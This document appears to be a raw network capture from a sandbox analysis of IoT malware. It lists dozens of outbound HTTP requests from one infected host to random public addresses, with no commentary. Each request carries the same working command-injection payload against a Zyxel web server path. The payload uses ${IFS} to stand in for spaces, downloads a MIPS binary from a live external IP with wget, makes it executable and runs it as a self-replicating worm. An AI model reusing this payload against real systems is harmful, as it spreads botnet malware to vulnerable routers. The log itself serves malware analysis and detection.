                                                Jan 12, 2024 18:16:27.559031963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5513192.168.2.2359850117.43.153.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559071064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5514192.168.2.2351396138.89.16.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559101105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5515192.168.2.2355792195.203.240.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559139967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5516192.168.2.2339790210.235.162.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559191942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5517192.168.2.2351058188.215.119.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559243917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5518192.168.2.2354746201.138.172.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559283018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5519192.168.2.23569741.227.226.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559304953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5520192.168.2.235397468.201.59.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559355021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5521192.168.2.23475689.104.198.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559406042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5522192.168.2.2340804121.177.55.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559429884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5523192.168.2.2345764201.181.102.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559494972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5524192.168.2.236023085.233.232.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559539080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5525192.168.2.2333692206.82.127.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559575081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5526192.168.2.235298645.169.133.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559598923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5527192.168.2.234315679.164.225.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559622049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5528192.168.2.2352418105.140.66.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559652090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5529192.168.2.234710676.112.179.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559717894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5530192.168.2.2354442146.111.120.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559740067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5531192.168.2.2353080132.128.122.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559796095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5532192.168.2.234398417.250.7.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559835911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5533192.168.2.2352032104.149.233.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559863091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5534192.168.2.233568880.39.1.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559905052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5535192.168.2.235134036.92.107.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.559938908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5536192.168.2.2333358192.156.134.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560000896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5537192.168.2.234051251.163.210.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560049057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5538192.168.2.2345670191.143.61.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560089111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5539192.168.2.2340840143.225.123.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560118914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5540192.168.2.233325693.129.20.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560173035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5541192.168.2.2334384107.16.248.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560220003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5542192.168.2.233819095.23.116.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560257912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5543192.168.2.233797082.38.235.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560287952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5544192.168.2.234543249.10.169.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560338020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5545192.168.2.2347826181.168.25.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560375929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5546192.168.2.233469650.215.43.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560412884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5547192.168.2.233647031.45.222.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560444117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5548192.168.2.2343230170.57.54.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560471058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5549192.168.2.2341304143.89.96.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560520887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5550192.168.2.23402305.69.64.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560556889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5551192.168.2.2359712101.34.241.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560585976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5552192.168.2.233315285.15.233.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560616016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5553192.168.2.2357602162.31.253.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560633898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5554192.168.2.2346674111.206.224.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560674906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5555192.168.2.2333064205.146.60.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560709000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5556192.168.2.234835840.228.188.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560720921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5557192.168.2.2357968111.175.60.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560756922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5558192.168.2.233554046.64.254.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560797930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5559192.168.2.2353216207.76.54.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560827017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5560192.168.2.235678024.235.230.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560867071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5561192.168.2.235282291.217.36.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560899019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5562192.168.2.2352176128.53.245.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560952902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5563192.168.2.2337066184.152.213.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.560986042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5564192.168.2.2335814123.30.193.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561045885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5565192.168.2.234742447.22.219.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561069012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5566192.168.2.2346586139.252.48.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561127901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5567192.168.2.2357194167.213.202.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561147928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5568192.168.2.234911054.150.33.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561194897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5569192.168.2.235374091.84.254.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561208963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5570192.168.2.2348580195.250.66.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561254025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5571192.168.2.2348422143.181.210.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561294079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5572192.168.2.2351646120.143.201.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561317921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5573192.168.2.2347950125.81.191.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561367035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5574192.168.2.235451444.215.105.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561419010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5575192.168.2.2345438207.74.179.247443
                                                TimestampBytes transferredDirectionData
